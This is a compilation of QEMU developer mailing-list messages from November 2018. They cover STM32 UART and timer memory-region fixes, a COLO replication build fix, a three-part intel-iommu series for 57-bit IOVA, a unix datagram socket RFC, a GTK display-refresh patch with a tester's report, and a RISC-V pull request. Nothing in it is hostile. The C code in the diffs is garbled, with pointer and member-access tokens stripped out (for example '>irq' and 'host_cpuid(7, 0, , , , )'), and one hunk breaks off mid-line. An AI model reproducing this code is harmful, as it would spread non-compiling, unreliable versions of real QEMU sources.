[Qemu-devel] [PATCH] Corrected memory regions

[Seth K]

I corrected these 2 memory regions based on specifications from the chip
manufacturer. The existing ranges seem to overlap and and cause odd
behavior and/or crashes when trying to set up multiple UARTs,
I also played with changing MAX_SERIAL_PORTS to 8 to match the hardware,
but I did not include that in this patch as I never fully tested its
effects.
This is my first patch, I hope I did it correctly,
Seth Kintigh
---
 hw/char/stm32f2xx_usart.c  | 2 +-
 hw/timer/stm32f2xx_timer.c | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/hw/char/stm32f2xx_usart.c b/hw/char/stm32f2xx_usart.c
index 032b5fda13..f3363a2952 100644
--- a/hw/char/stm32f2xx_usart.c
+++ b/hw/char/stm32f2xx_usart.c
@@ -202,7 +202,7 @@ static void stm32f2xx_usart_init(Object *obj)
 sysbus_init_irq(SYS_BUS_DEVICE(obj), >irq);

 memory_region_init_io(>mmio, obj, _usart_ops, s,
-  TYPE_STM32F2XX_USART, 0x2000);
+  TYPE_STM32F2XX_USART, 0x400);
 sysbus_init_mmio(SYS_BUS_DEVICE(obj), >mmio);
 }

diff --git a/hw/timer/stm32f2xx_timer.c b/hw/timer/stm32f2xx_timer.c
index 58fc7b1188..ae744d1642 100644
--- a/hw/timer/stm32f2xx_timer.c
+++ b/hw/timer/stm32f2xx_timer.c
@@ -308,7 +308,7 @@ static void stm32f2xx_timer_init(Object *obj)
 sysbus_init_irq(SYS_BUS_DEVICE(obj), >irq);

 memory_region_init_io(>iomem, obj, _timer_ops, s,
-  "stm32f2xx_timer", 0x4000);
+  "stm32f2xx_timer", 0x400);
 sysbus_init_mmio(SYS_BUS_DEVICE(obj), >iomem);

 s->timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, stm32f2xx_timer_interrupt,
s);
-- 
2.11.0

[Qemu-devel] [PATCH] replication: Make --disable-replication compile

[Peter Xu]

We've fixed it before like 38bb54f323 ("replication: Make
--disable-replication compile again", 2017-04-28) but it's failing
again.  So fix it again.

There could be even cleaner way to fix this but current way is the
simplest.  Let's start from simple.

CC: zhanghailiang 
CC: Juan Quintela 
CC: "Dr. David Alan Gilbert" 
CC: Peter Maydell 
CC: Yanan Fu 
CC: Markus Armbruster 
Reported-by: Yanan Fu 
Signed-off-by: Peter Xu 
---
 migration/colo.c | 23 +++
 1 file changed, 23 insertions(+)

diff --git a/migration/colo.c b/migration/colo.c
index 956ac236b7..78b64ef0cb 100644
--- a/migration/colo.c
+++ b/migration/colo.c
@@ -33,8 +33,10 @@
 #include "sysemu/cpus.h"
 #include "net/filter.h"
 
+#ifdef CONFIG_REPLICATION
 static bool vmstate_loading;
 static Notifier packets_compare_notifier;
+#endif
 
 #define COLO_BUFFER_BASE_SIZE (4 * 1024 * 1024)
 
@@ -59,6 +61,7 @@ static bool colo_runstate_is_stopped(void)
 
 static void secondary_vm_do_failover(void)
 {
+#ifdef CONFIG_REPLICATION
 int old_state;
 MigrationIncomingState *mis = migration_incoming_get_current();
 Error *local_err = NULL;
@@ -121,10 +124,14 @@ static void secondary_vm_do_failover(void)
 if (mis->migration_incoming_co) {
 qemu_coroutine_enter(mis->migration_incoming_co);
 }
+#else
+abort();
+#endif
 }
 
 static void primary_vm_do_failover(void)
 {
+#ifdef CONFIG_REPLICATION
 MigrationState *s = migrate_get_current();
 int old_state;
 Error *local_err = NULL;
@@ -165,6 +172,9 @@ static void primary_vm_do_failover(void)
 
 /* Notify COLO thread that failover work is finished */
 qemu_sem_post(>colo_exit_sem);
+#else
+abort();
+#endif
 }
 
 COLOMode get_colo_mode(void)
@@ -271,6 +281,8 @@ COLOStatus *qmp_query_colo_status(Error **errp)
 return s;
 }
 
+#ifdef CONFIG_REPLICATION
+
 static void colo_send_message(QEMUFile *f, COLOMessage msg,
   Error **errp)
 {
@@ -489,9 +501,11 @@ static void colo_compare_notify_checkpoint(Notifier 
*notifier, void *data)
 {
 colo_checkpoint_notify(data);
 }
+#endif
 
 static void colo_process_checkpoint(MigrationState *s)
 {
+#ifdef CONFIG_REPLICATION
 QIOChannelBuffer *bioc;
 QEMUFile *fb = NULL;
 int64_t current_time = qemu_clock_get_ms(QEMU_CLOCK_HOST);
@@ -603,6 +617,9 @@ out:
 if (s->rp_state.from_dst_file) {
 qemu_fclose(s->rp_state.from_dst_file);
 }
+#else
+abort();
+#endif
 }
 
 void colo_checkpoint_notify(void *opaque)
@@ -631,6 +648,7 @@ void migrate_start_colo_process(MigrationState *s)
 qemu_mutex_lock_iothread();
 }
 
+#ifdef CONFIG_REPLICATION
 static void colo_wait_handle_message(QEMUFile *f, int *checkpoint_request,
  Error **errp)
 {
@@ -653,9 +671,11 @@ static void colo_wait_handle_message(QEMUFile *f, int 
*checkpoint_request,
 break;
 }
 }
+#endif
 
 void *colo_process_incoming_thread(void *opaque)
 {
+#ifdef CONFIG_REPLICATION
 MigrationIncomingState *mis = opaque;
 QEMUFile *fb = NULL;
 QIOChannelBuffer *bioc = NULL; /* Cache incoming device state */
@@ -859,4 +879,7 @@ out:
 
 rcu_unregister_thread();
 return NULL;
+#else
+abort();
+#endif
 }
-- 
2.17.1

Re: [Qemu-devel] [for 3.1? PATCH] qcow2: Assert that refcount block offsets fit in the refcount table

[Alberto Garcia]

On Tue 13 Nov 2018 06:06:54 PM CET, Eric Blake  wrote:

>> Refcount table entries have a field to store the offset of the
>> refcount block. The rest of the bits of the entry are currently
>> reserved.
>> 
>> The offset is always taken from the entry using REFT_OFFSET_MASK to
>> ensure that we only use the bits that belong to that field.
>> 
>> While that mask is used every time we read from the refcount table, it
>> is never used when we write to it. Due to the other constraints of the
>> qcow2 format QEMU can never produce refcount block offsets that don't
>> fit in that field so any such offset when allocating a refcount block
>> would indicate a bug in QEMU.
>> ---
>>   block/qcow2-refcount.c | 3 +++
>>   1 file changed, 3 insertions(+)
>> 
>
> Reviewed-by: Eric Blake 

Yes, for 3.1, shall I resend it with the updated subject message?

Berto

Re: [Qemu-devel] [PATCH v2 3/3] intel-iommu: extend iotlb search logic to cover 57-bit IOVA.

[Yu Zhang]

On Wed, Nov 14, 2018 at 02:41:15PM +0800, Peter Xu wrote:
> On Wed, Nov 14, 2018 at 02:04:44PM +0800, Yu Zhang wrote:
> > The 64-bit key used by vtd_lookup_iotlb() to search the cached
> > mappings is formed by combining the GFN, source id and the page
> > level. To cover 57-bit IOVA, the shift of source id and of page
> > level need to be enlarged by 9 - the stride of one paging structure
> > level.
> > 
> > Signed-off-by: Yu Zhang 
> 
> Reviewed-by: Peter Xu 
> 
> But note that we should have this patch either squashed into previous
> patch, or at least it should appear earlier than patch 2 since
> otherwise patch 2 could possibly break.  I would prefer squashing
> since it's really part of patch 2, and please feel free to pick my r-b
> if you want to resent with a squashed version in the future.
> 

Got it. Thanks, Peter. Will send the squashed patch right after the release. :)

> Regards,
> 
> -- 
> Peter Xu

B.R.
Yu

Re: [Qemu-devel] [PATCH v2 3/3] intel-iommu: extend iotlb search logic to cover 57-bit IOVA.

[Peter Xu]

On Wed, Nov 14, 2018 at 02:04:44PM +0800, Yu Zhang wrote:
> The 64-bit key used by vtd_lookup_iotlb() to search the cached
> mappings is formed by combining the GFN, source id and the page
> level. To cover 57-bit IOVA, the shift of source id and of page
> level need to be enlarged by 9 - the stride of one paging structure
> level.
> 
> Signed-off-by: Yu Zhang 

Reviewed-by: Peter Xu 

But note that we should have this patch either squashed into previous
patch, or at least it should appear earlier than patch 2 since
otherwise patch 2 could possibly break.  I would prefer squashing
since it's really part of patch 2, and please feel free to pick my r-b
if you want to resent with a squashed version in the future.

Regards,

-- 
Peter Xu

Re: [Qemu-devel] [PATCH v2 2/3] intel-iommu: extend VTD emulation to allow 57-bit IOVA address width.

[Peter Xu]

On Wed, Nov 14, 2018 at 02:04:43PM +0800, Yu Zhang wrote:
> A 5-level paging capable VM may choose to use 57-bit IOVA address width.
> E.g. guest applications may prefer to use its VA as IOVA when performing
> VFIO map/unmap operations, to avoid the burden of managing the IOVA space.
> 
> This patch extends the current vIOMMU logic to cover the extended address
> width. When creating a VM with 5-level paging feature, one can choose to
> create a virtual VTD with 5-level paging capability, with configurations
> like "-device intel-iommu,x-aw-bits=57".
> 
> Signed-off-by: Yu Zhang 

Reviewed-by: Peter Xu 

-- 
Peter Xu

Re: [Qemu-devel] [PATCH v2 1/3] intel-iommu: differentiate host address width from IOVA address width.

[Peter Xu]

On Wed, Nov 14, 2018 at 02:04:42PM +0800, Yu Zhang wrote:
> Currently, vIOMMU is using the value of IOVA address width, instead of
> the host address width(HAW) to calculate the number of reserved bits in
> data structures such as root entries, context entries, and entries of
> DMA paging structures etc.
> 
> However values of IOVA address width and of the HAW may not equal. For
> example, a 48-bit IOVA can only be mapped to host addresses no wider than
> 46 bits. Using 48, instead of 46 to calculate the reserved bit may result
> in an invalid IOVA being accepted.
> 
> To fix this, a new field - haw_bits is introduced in struct IntelIOMMUState,
> whose value is initialized based on the maximum physical address set to
> guest CPU. Also, definitions such as VTD_HOST_AW_39/48BIT etc. are renamed
> to clarify.
> 
> Signed-off-by: Yu Zhang 

Reviewed-by: Peter Xu 

-- 
Peter Xu

[Qemu-devel] [PATCH v2 1/3] intel-iommu: differentiate host address width from IOVA address width.

[Yu Zhang]

Currently, vIOMMU is using the value of IOVA address width, instead of
the host address width(HAW) to calculate the number of reserved bits in
data structures such as root entries, context entries, and entries of
DMA paging structures etc.

However values of IOVA address width and of the HAW may not equal. For
example, a 48-bit IOVA can only be mapped to host addresses no wider than
46 bits. Using 48, instead of 46 to calculate the reserved bit may result
in an invalid IOVA being accepted.

To fix this, a new field - haw_bits is introduced in struct IntelIOMMUState,
whose value is initialized based on the maximum physical address set to
guest CPU. Also, definitions such as VTD_HOST_AW_39/48BIT etc. are renamed
to clarify.

Signed-off-by: Yu Zhang 
---
Cc: "Michael S. Tsirkin"  
Cc: Igor Mammedov  
Cc: Marcel Apfelbaum 
Cc: Paolo Bonzini  
Cc: Richard Henderson  
Cc: Eduardo Habkost 
Cc: Peter Xu 
---
 hw/i386/acpi-build.c  |  2 +-
 hw/i386/intel_iommu.c | 55 ---
 include/hw/i386/intel_iommu.h |  9 +++
 3 files changed, 37 insertions(+), 29 deletions(-)

diff --git a/hw/i386/acpi-build.c b/hw/i386/acpi-build.c
index 236a20e..b989523 100644
--- a/hw/i386/acpi-build.c
+++ b/hw/i386/acpi-build.c
@@ -2431,7 +2431,7 @@ build_dmar_q35(GArray *table_data, BIOSLinker *linker)
 }
 
 dmar = acpi_data_push(table_data, sizeof(*dmar));
-dmar->host_address_width = intel_iommu->aw_bits - 1;
+dmar->host_address_width = intel_iommu->haw_bits - 1;
 dmar->flags = dmar_flags;
 
 /* DMAR Remapping Hardware Unit Definition structure */
diff --git a/hw/i386/intel_iommu.c b/hw/i386/intel_iommu.c
index d97bcbc..0e88c63 100644
--- a/hw/i386/intel_iommu.c
+++ b/hw/i386/intel_iommu.c
@@ -707,7 +707,8 @@ static VTDBus *vtd_find_as_from_bus_num(IntelIOMMUState *s, 
uint8_t bus_num)
  */
 static int vtd_iova_to_slpte(VTDContextEntry *ce, uint64_t iova, bool is_write,
  uint64_t *slptep, uint32_t *slpte_level,
- bool *reads, bool *writes, uint8_t aw_bits)
+ bool *reads, bool *writes, uint8_t aw_bits,
+ uint8_t haw_bits)
 {
 dma_addr_t addr = vtd_ce_get_slpt_base(ce);
 uint32_t level = vtd_ce_get_level(ce);
@@ -760,7 +761,7 @@ static int vtd_iova_to_slpte(VTDContextEntry *ce, uint64_t 
iova, bool is_write,
 *slpte_level = level;
 return 0;
 }
-addr = vtd_get_slpte_addr(slpte, aw_bits);
+addr = vtd_get_slpte_addr(slpte, haw_bits);
 level--;
 }
 }
@@ -783,6 +784,7 @@ typedef struct {
 void *private;
 bool notify_unmap;
 uint8_t aw;
+uint8_t haw;
 uint16_t domain_id;
 } vtd_page_walk_info;
 
@@ -925,7 +927,7 @@ static int vtd_page_walk_level(dma_addr_t addr, uint64_t 
start,
  * This is a valid PDE (or even bigger than PDE).  We need
  * to walk one further level.
  */
-ret = vtd_page_walk_level(vtd_get_slpte_addr(slpte, info->aw),
+ret = vtd_page_walk_level(vtd_get_slpte_addr(slpte, info->haw),
   iova, MIN(iova_next, end), level - 1,
   read_cur, write_cur, info);
 } else {
@@ -942,7 +944,7 @@ static int vtd_page_walk_level(dma_addr_t addr, uint64_t 
start,
 entry.perm = IOMMU_ACCESS_FLAG(read_cur, write_cur);
 entry.addr_mask = ~subpage_mask;
 /* NOTE: this is only meaningful if entry_valid == true */
-entry.translated_addr = vtd_get_slpte_addr(slpte, info->aw);
+entry.translated_addr = vtd_get_slpte_addr(slpte, info->haw);
 ret = vtd_page_walk_one(, info);
 }
 
@@ -1002,7 +1004,7 @@ static int vtd_dev_to_context_entry(IntelIOMMUState *s, 
uint8_t bus_num,
 return -VTD_FR_ROOT_ENTRY_P;
 }
 
-if (re.rsvd || (re.val & VTD_ROOT_ENTRY_RSVD(s->aw_bits))) {
+if (re.rsvd || (re.val & VTD_ROOT_ENTRY_RSVD(s->haw_bits))) {
 trace_vtd_re_invalid(re.rsvd, re.val);
 return -VTD_FR_ROOT_ENTRY_RSVD;
 }
@@ -1019,7 +1021,7 @@ static int vtd_dev_to_context_entry(IntelIOMMUState *s, 
uint8_t bus_num,
 }
 
 if ((ce->hi & VTD_CONTEXT_ENTRY_RSVD_HI) ||
-   (ce->lo & VTD_CONTEXT_ENTRY_RSVD_LO(s->aw_bits))) {
+   (ce->lo & VTD_CONTEXT_ENTRY_RSVD_LO(s->haw_bits))) {
 trace_vtd_ce_invalid(ce->hi, ce->lo);
 return -VTD_FR_CONTEXT_ENTRY_RSVD;
 }
@@ -1056,6 +1058,7 @@ static int 
vtd_sync_shadow_page_table_range(VTDAddressSpace *vtd_as,
 .private = (void *)_as->iommu,
 .notify_unmap = true,
 .aw = s->aw_bits,
+.haw = s->haw_bits,
 .as = vtd_as,
 .domain_id = VTD_CONTEXT_ENTRY_DID(ce->hi),
 };
@@ -1360,7 +1363,7 @@ static bool vtd_do_iommu_translate(VTDAddressSpace 
*vtd_as, PCIBus *bus,
 }
 
 ret_fr = vtd_iova_to_slpte(, 

[Qemu-devel] [PATCH v2 2/3] intel-iommu: extend VTD emulation to allow 57-bit IOVA address width.

[Yu Zhang]

A 5-level paging capable VM may choose to use 57-bit IOVA address width.
E.g. guest applications may prefer to use its VA as IOVA when performing
VFIO map/unmap operations, to avoid the burden of managing the IOVA space.

This patch extends the current vIOMMU logic to cover the extended address
width. When creating a VM with 5-level paging feature, one can choose to
create a virtual VTD with 5-level paging capability, with configurations
like "-device intel-iommu,x-aw-bits=57".

Signed-off-by: Yu Zhang 
---
Cc: "Michael S. Tsirkin" 
Cc: Marcel Apfelbaum 
Cc: Paolo Bonzini 
Cc: Richard Henderson 
Cc: Eduardo Habkost 
Cc: Peter Xu 
---
 hw/i386/intel_iommu.c  | 53 --
 hw/i386/intel_iommu_internal.h |  6 +
 include/hw/i386/intel_iommu.h  |  1 +
 3 files changed, 48 insertions(+), 12 deletions(-)

diff --git a/hw/i386/intel_iommu.c b/hw/i386/intel_iommu.c
index 0e88c63..871110c 100644
--- a/hw/i386/intel_iommu.c
+++ b/hw/i386/intel_iommu.c
@@ -664,16 +664,16 @@ static inline bool vtd_iova_range_check(uint64_t iova, 
VTDContextEntry *ce,
 
 /*
  * Rsvd field masks for spte:
- * Index [1] to [4] 4k pages
- * Index [5] to [8] large pages
+ * Index [1] to [5] 4k pages
+ * Index [6] to [10] large pages
  */
-static uint64_t vtd_paging_entry_rsvd_field[9];
+static uint64_t vtd_paging_entry_rsvd_field[11];
 
 static bool vtd_slpte_nonzero_rsvd(uint64_t slpte, uint32_t level)
 {
 if (slpte & VTD_SL_PT_PAGE_SIZE_MASK) {
 /* Maybe large page */
-return slpte & vtd_paging_entry_rsvd_field[level + 4];
+return slpte & vtd_paging_entry_rsvd_field[level + 5];
 } else {
 return slpte & vtd_paging_entry_rsvd_field[level];
 }
@@ -3127,6 +3127,8 @@ static void vtd_init(IntelIOMMUState *s)
  VTD_CAP_SAGAW_39bit | VTD_CAP_MGAW(s->aw_bits);
 if (s->aw_bits == VTD_AW_48BIT) {
 s->cap |= VTD_CAP_SAGAW_48bit;
+} else if (s->aw_bits == VTD_AW_57BIT) {
+s->cap |= VTD_CAP_SAGAW_57bit | VTD_CAP_SAGAW_48bit;
 }
 s->ecap = VTD_ECAP_QI | VTD_ECAP_IRO;
 s->haw_bits = cpu->phys_bits;
@@ -3139,10 +3141,12 @@ static void vtd_init(IntelIOMMUState *s)
 vtd_paging_entry_rsvd_field[2] = VTD_SPTE_PAGE_L2_RSVD_MASK(s->haw_bits);
 vtd_paging_entry_rsvd_field[3] = VTD_SPTE_PAGE_L3_RSVD_MASK(s->haw_bits);
 vtd_paging_entry_rsvd_field[4] = VTD_SPTE_PAGE_L4_RSVD_MASK(s->haw_bits);
-vtd_paging_entry_rsvd_field[5] = VTD_SPTE_LPAGE_L1_RSVD_MASK(s->haw_bits);
-vtd_paging_entry_rsvd_field[6] = VTD_SPTE_LPAGE_L2_RSVD_MASK(s->haw_bits);
-vtd_paging_entry_rsvd_field[7] = VTD_SPTE_LPAGE_L3_RSVD_MASK(s->haw_bits);
-vtd_paging_entry_rsvd_field[8] = VTD_SPTE_LPAGE_L4_RSVD_MASK(s->haw_bits);
+vtd_paging_entry_rsvd_field[5] = VTD_SPTE_PAGE_L5_RSVD_MASK(s->haw_bits);
+vtd_paging_entry_rsvd_field[6] = VTD_SPTE_LPAGE_L1_RSVD_MASK(s->haw_bits);
+vtd_paging_entry_rsvd_field[7] = VTD_SPTE_LPAGE_L2_RSVD_MASK(s->haw_bits);
+vtd_paging_entry_rsvd_field[8] = VTD_SPTE_LPAGE_L3_RSVD_MASK(s->haw_bits);
+vtd_paging_entry_rsvd_field[9] = VTD_SPTE_LPAGE_L4_RSVD_MASK(s->haw_bits);
+vtd_paging_entry_rsvd_field[10] = VTD_SPTE_LPAGE_L5_RSVD_MASK(s->haw_bits);
 
 if (x86_iommu->intr_supported) {
 s->ecap |= VTD_ECAP_IR | VTD_ECAP_MHMV;
@@ -3241,6 +3245,23 @@ static AddressSpace *vtd_host_dma_iommu(PCIBus *bus, 
void *opaque, int devfn)
 return _as->as;
 }
 
+static bool host_has_la57(void)
+{
+uint32_t ecx, unused;
+
+host_cpuid(7, 0, , , , );
+return ecx & CPUID_7_0_ECX_LA57;
+}
+
+static bool guest_has_la57(void)
+{
+CPUState *cs = first_cpu;
+X86CPU *cpu = X86_CPU(cs);
+CPUX86State *env = >env;
+
+return env->features[FEAT_7_0_ECX] & CPUID_7_0_ECX_LA57;
+}
+
 static bool vtd_decide_config(IntelIOMMUState *s, Error **errp)
 {
 X86IOMMUState *x86_iommu = X86_IOMMU_DEVICE(s);
@@ -3267,11 +3288,19 @@ static bool vtd_decide_config(IntelIOMMUState *s, Error 
**errp)
 }
 }
 
-/* Currently only address widths supported are 39 and 48 bits */
+/* Currently address widths supported are 39, 48, and 57 bits */
 if ((s->aw_bits != VTD_AW_39BIT) &&
-(s->aw_bits != VTD_AW_48BIT)) {
-error_setg(errp, "Supported values for x-aw-bits are: %d, %d",
-   VTD_AW_39BIT, VTD_AW_48BIT);
+(s->aw_bits != VTD_AW_48BIT) &&
+(s->aw_bits != VTD_AW_57BIT)) {
+error_setg(errp, "Supported values for x-aw-bits are: %d, %d, %d",
+   VTD_AW_39BIT, VTD_AW_48BIT, VTD_AW_57BIT);
+return false;
+}
+
+if ((s->aw_bits == VTD_AW_57BIT) &&
+!(host_has_la57() && guest_has_la57())) {
+error_setg(errp, "Do not support 57-bit DMA address, unless both "
+ "host and guest are capable of 5-level paging");
 return false;
 }
 
diff --git a/hw/i386/intel_iommu_internal.h b/hw/i386/intel_iommu_internal.h
index d084099..a7ef24b 

[Qemu-devel] [PATCH v2 3/3] intel-iommu: extend iotlb search logic to cover 57-bit IOVA.

[Yu Zhang]

The 64-bit key used by vtd_lookup_iotlb() to search the cached
mappings is formed by combining the GFN, source id and the page
level. To cover 57-bit IOVA, the shift of source id and of page
level need to be enlarged by 9 - the stride of one paging structure
level.

Signed-off-by: Yu Zhang 
---
Cc: "Michael S. Tsirkin" 
Cc: Marcel Apfelbaum 
Cc: Paolo Bonzini  
Cc: Richard Henderson  
Cc: Eduardo Habkost 
Cc: Peter Xu 
---
 hw/i386/intel_iommu_internal.h | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/hw/i386/intel_iommu_internal.h b/hw/i386/intel_iommu_internal.h
index a7ef24b..2b29b6f 100644
--- a/hw/i386/intel_iommu_internal.h
+++ b/hw/i386/intel_iommu_internal.h
@@ -114,8 +114,8 @@
  VTD_INTERRUPT_ADDR_FIRST + 1)
 
 /* The shift of source_id in the key of IOTLB hash table */
-#define VTD_IOTLB_SID_SHIFT 36
-#define VTD_IOTLB_LVL_SHIFT 52
+#define VTD_IOTLB_SID_SHIFT 45
+#define VTD_IOTLB_LVL_SHIFT 61
 #define VTD_IOTLB_MAX_SIZE  1024/* Max size of the hash table */
 
 /* IOTLB_REG */
-- 
1.9.1

[Qemu-devel] [PATCH v2 0/3] intel-iommu: add support for 5-level virtual IOMMU.

[Yu Zhang]

Intel's upcoming processors will extend maximum linear address width to
57 bits, and introduce 5-level paging for CPU. Meanwhile, the platform
will also extend the maximum guest address width for IOMMU to 57 bits,
thus introducing the 5-level paging for 2nd level translation(See chapter
3 in Intel Virtualization Technology for Directed I/O). 

This patch series extends the current logic to support a wider address width.
A 5-level paging capable IOMMU(for 2nd level translation) can be rendered
with configuration "device intel-iommu,x-aw-bits=57".

Also, kvm-unit-tests were updated to verify this patch series. Patch for
the test was sent out at: https://www.spinics.net/lists/kvm/msg177425.html.

Note: this patch series checks the existance of 5-level paging in the host
and in the guest, and rejects configurations for 57-bit IOVA if either check
fails(VTD-d hardware shall not support 57-bit IOVA on platforms without CPU
5-level paging). However, current vIOMMU implementation still lacks logic to
check against the physical IOMMU capability, future enhancements are expected
to do this.

Changes in V2:
- Address comments from Peter Xu: add haw member in vtd_page_walk_info.
- Address comments from Peter Xu: only searches for 4K/2M/1G mappings in
iotlb are meaningful. 
- Address comments from Peter Xu: cover letter changes(e.g. mention the test
patch in kvm-unit-tests).
- Coding style changes.


Yu Zhang (3):
  intel-iommu: differentiate host address width from IOVA address width.
  intel-iommu: extend VTD emulation to allow 57-bit IOVA address width.
  intel-iommu: extend iotlb search logic to cover 57-bit IOVA.
---
Cc: "Michael S. Tsirkin"  
Cc: Igor Mammedov  
Cc: Marcel Apfelbaum 
Cc: Paolo Bonzini  
Cc: Richard Henderson  
Cc: Eduardo Habkost 
Cc: Peter Xu 


 hw/i386/acpi-build.c   |  2 +-
 hw/i386/intel_iommu.c  | 96 +-
 hw/i386/intel_iommu_internal.h | 10 -
 include/hw/i386/intel_iommu.h  | 10 +++--
 4 files changed, 81 insertions(+), 37 deletions(-)

-- 
1.9.1

Re: [Qemu-devel] [PATCH] RFC: net/socket: learn to talk with a unix dgram socket

[Jason Wang]

On 2018/11/10 上午3:56, Marc-André Lureau wrote:

-net socket has a fd argument, and may be passed pre-opened sockets.

TCP sockets use framing.
UDP sockets have datagram boundaries.

When given a unix dgram socket, it will be able to read from it, but
will attempt to send on the dgram_dst, which is unset. The other end
will not receive the data.

Let's teach -net socket to recognize a UNIX DGRAM socket, and use the
regular send() command (without dgram_dst).

This makes running slirp out-of-process possible that
way (python pseudo-code):

a, b = socket.socketpair(socket.AF_UNIX, socket.SOCK_DGRAM)

subprocess.Popen('qemu -net socket,fd=%d -net user' % a.fileno(), shell=True)
subprocess.Popen('qemu ... -net nic -net socket,fd=%d' % b.fileno(), shell=True)

(to make slirp a seperate project altogether, we would have to have
some compatibility code and/or deprecate various options & HMP
commands for dynamic port forwarding etc - but this looks like a
reachable goal)

Signed-off-by: Marc-André Lureau 



I believe instead of supporting unnamed sockets, we should also support 
named one through cli?




---
  net/socket.c | 25 +
  1 file changed, 21 insertions(+), 4 deletions(-)

diff --git a/net/socket.c b/net/socket.c
index 7095eb749f..8a9c30892d 100644
--- a/net/socket.c
+++ b/net/socket.c
@@ -119,9 +119,13 @@ static ssize_t net_socket_receive_dgram(NetClientState 
*nc, const uint8_t *buf,
  ssize_t ret;
  
  do {

-ret = qemu_sendto(s->fd, buf, size, 0,
-  (struct sockaddr *)>dgram_dst,
-  sizeof(s->dgram_dst));
+if (s->dgram_dst.sin_family != AF_UNIX) {
+ret = qemu_sendto(s->fd, buf, size, 0,
+  (struct sockaddr *)>dgram_dst,
+  sizeof(s->dgram_dst));
+} else {
+ret = send(s->fd, buf, size, 0);
+}



Any reason that send is a must here? send(2) said:
   call

   send(sockfd, buf, len, flags);

   is equivalent to

   sendto(sockfd, buf, len, flags, NULL, 0);


Thanks



  } while (ret == -1 && errno == EINTR);
  
  if (ret == -1 && errno == EAGAIN) {

@@ -322,6 +326,15 @@ static NetSocketState 
*net_socket_fd_init_dgram(NetClientState *peer,
  int newfd;
  NetClientState *nc;
  NetSocketState *s;
+SocketAddress *sa;
+SocketAddressType sa_type;
+
+sa = socket_local_address(fd, errp);
+if (!sa) {
+return NULL;
+}
+sa_type = sa->type;
+qapi_free_SocketAddress(sa);
  
  /* fd passed: multicast: "learn" dgram_dst address from bound address and save it

   * Because this may be "shared" socket from a "master" process, datagrams 
would be recv()
@@ -365,8 +378,12 @@ static NetSocketState 
*net_socket_fd_init_dgram(NetClientState *peer,
   "socket: fd=%d (cloned mcast=%s:%d)",
   fd, inet_ntoa(saddr.sin_addr), ntohs(saddr.sin_port));
  } else {
+if (sa_type == SOCKET_ADDRESS_TYPE_UNIX) {
+s->dgram_dst.sin_family = AF_UNIX;
+}
+
  snprintf(nc->info_str, sizeof(nc->info_str),
- "socket: fd=%d", fd);
+ "socket: fd=%d %s", fd, SocketAddressType_str(sa_type));
  }
  
  return s;

Re: [Qemu-devel] [PATCH] gtk: sync guest display updates to host display refresh

[Chen Zhang via Qemu-devel]

Hi,

I have briefly tested this patch. Unfortunately, it apparently caused 
deteriorated performance on a previously working Windows 10 guest with DMA Buf.

The patched qemu not only clogged up graphics drawing, but also obstructed the 
guest OS. The boot time and latency for guest operations (e.g. clicking Start 
menu in guest) dramatically increased. My best guess would be that GTK update 
events messed up with some polling in main_loop_wait(false), leading to blocked 
IO, or conversely the GUI being blocked by IO.

Best regards,

--
P.S:

The arguments for qemu:

/tmp/qemu-system-x86_64 -nodefaults -machine 
pc,accel=kvm,usb=off,kernel_irqchip=on \
  -vga none -display gtk,gl=on  -rtc base=localtime \
  -device 
vfio-pci,sysfsdev=/sys/bus/pci/devices/:00:02.0/{UUID-FOR-MDEV},x-igd-opregion=on,display=on,rombar=0
 \
  -m 3000 -realtime mlock=off -smp 3,sockets=1,cores=1 \
  -drive file=/home/user/disk.img,format=qcow2,media=disk,if=ide \
  -usb -device qemu-xhci,id=xhci -device usb-tablet,bus=xhci.0 \
  -cpu host -monitor stdio

The host runs a Ubuntu 18.04 desktop.

> On Nov 13, 2018, at 5:02 PM, Gerd Hoffmann  wrote:
> 
> Reduce console refresh timer to idle refresh rate.  Register a frame
> tick callback (called by gtk on each display frame) and use that to kick
> display updates instead.
> 
> That should sync qemu refresh rate to display refresh rate.  It'll also
> stop updating the qemu display in case the qemu is not visible (gtk
> stops calling the frame tick callback then).
> 
> Buglink: https://bugs.launchpad.net/bugs/1802915
> Suggested-by: Chen Zhang 
> Signed-off-by: Gerd Hoffmann 
> ---
> ui/gtk.c | 16 
> 1 file changed, 16 insertions(+)
> 
> diff --git a/ui/gtk.c b/ui/gtk.c
> index 579990b865..8f79dfe42c 100644
> --- a/ui/gtk.c
> +++ b/ui/gtk.c
> @@ -1661,6 +1661,16 @@ static gboolean gd_configure(GtkWidget *widget,
> return FALSE;
> }
> 
> +static gboolean gd_frame_tick(GtkWidget *widget,
> +  GdkFrameClock *frame_clock,
> +  gpointer opaque)
> +{
> +VirtualConsole *vc = opaque;
> +
> +vc->gfx.dcl.ops->dpy_refresh(>gfx.dcl);
> +return G_SOURCE_CONTINUE;
> +}
> +
> /** Virtual Console Callbacks **/
> 
> static GSList *gd_vc_menu_init(GtkDisplayState *s, VirtualConsole *vc,
> @@ -1911,6 +1921,12 @@ static void gd_connect_vc_gfx_signals(VirtualConsole 
> *vc)
>  G_CALLBACK(gd_focus_out_event), vc);
> g_signal_connect(vc->gfx.drawing_area, "configure-event",
>  G_CALLBACK(gd_configure), vc);
> +if (1 /* make that a config option ??? */) {
> +update_displaychangelistener(>gfx.dcl,
> + GUI_REFRESH_INTERVAL_IDLE);
> +gtk_widget_add_tick_callback(vc->gfx.drawing_area,
> + gd_frame_tick, vc, NULL);
> +}
> } else {
> g_signal_connect(vc->gfx.drawing_area, "key-press-event",
>  G_CALLBACK(gd_text_key_down), vc);
> -- 
> 2.9.3
> 

Re: [Qemu-devel] [PR RFC] RISC-V Patches for 3.1-rc2

[Michael Clark]

On Wed, Nov 14, 2018 at 12:52 PM Palmer Dabbelt  wrote:

> The following changes since commit
> cb968d275c145467c8b385a3618a207ec111eab1:
>
>   Update version for v3.1.0-rc1 release (2018-11-13 18:16:14 +)
>
> are available in the Git repository at:
>
>   git://github.com/riscv/riscv-qemu.git tags/riscv-for-master-3.1-rc2
>
> for you to fetch changes up to 3502dc824a7b0218abb49f4350e80a49829748cf:
>
>   RISC-V: Respect fences for user-only emulators (2018-11-13 15:12:15
> -0800)
>
> 
> RISC-V Patches for 3.1-rc2
>
> This pull request contains four patches that aren't really related to
> each other aside from all being bug fixes that I think should go in for
> 3.1.0:
>

Here's I again. I guess its a somewhat arbitrary set of fixes. Although one
could say the same about the set of fixes in the github repo.

